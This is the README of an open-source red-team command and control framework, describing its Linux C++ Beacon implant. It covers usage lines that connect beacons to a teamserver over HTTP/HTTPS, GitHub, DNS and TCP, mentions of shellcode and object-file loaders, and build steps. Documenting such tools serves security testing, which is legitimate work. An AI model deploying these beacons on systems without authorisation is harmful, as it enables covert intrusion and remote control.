Exploration is a modular Command and Control (C2) framework designed for red team operations. This repository provides the Beacon component implemented in C++ for targeting Linux systems. The associated TeamServer and Client components are available in the C2TeamServer repository.
Multiple Beacons in this project are capable of communicating with the TeamServer over various channels. Supported transport mechanisms include HTTP/HTTPS, GitHub, DNS, and TCP.
# HTTP/HTTPS BeaconHttp <TEAMSERVER_IP> <LISTENER_PORT> <http|https> BeaconHttp 10.10.10.10 8443 https BeaconHttp 10.10.10.10 8080 http # GitHub BeaconGithub <GITHUB_USER/REPO> <ACCESS_TOKEN> BeaconGithub maxDcb/C2Implant ghp_dsfgdfhdf5554456g4fdg465... # DNS BeaconDns <DNS_SERVER> <TEAMSERVER_DOMAIN> BeaconDns 8.8.8.8 bac.superdomain.com # TCP BeaconTcp <LISTENER_IP> <LISTENER_PORT> BeaconTcp 127.0.0.1 4444This project utilizes several external libraries and tools:
- Donut: Generates shellcode from PE files.
- COFFLoader: Executes object files, such as those in CS-Situational-Awareness-BOF.
- cpp-base64: Provides base64 encoding/decoding.
- nlohmann/json: JSON parsing library.
Initialize submodules and prepare the build environment:
git submodule update --init mkdir build cd buildCompile:
cmake .. -DCMAKE_PROJECT_TOP_LEVEL_INCLUDES=./conan_provider.cmake make -j4Project can also be build with the C2Core package:
# download last linux package url="$(curl -sH 'Accept: application/vnd.github+json' \ ${GITHUB_TOKEN:+-H "Authorization: Bearer $GITHUB_TOKEN"} \ 'https://api.github.com/repos/maxDcb/C2Core/releases?per_page=100' \ | jq -r '[.[] | select(.tag_name|startswith("linux-"))] | sort_by(.created_at) | reverse | .[0].assets[] | select(.name|test("^C2Core-Linux.*")) | .browser_download_url' | head -n1)" fname="${url##*/}" curl -L "$url" -o "$fname" echo "Downloaded: $fname" mkdir -p C2Core-Linux && tar -xzf C2Core-Linux.tar.gz -C C2Core-Linux export CMAKE_PREFIX_PATH=`pwd`/C2Core-Linux cmake .. -DCMAKE_PROJECT_TOP_LEVEL_INCLUDES=./conan_provider.cmake make -j4 - Compiled Beacons:
Release/Beacons - Compiled Modules:
Release/Modules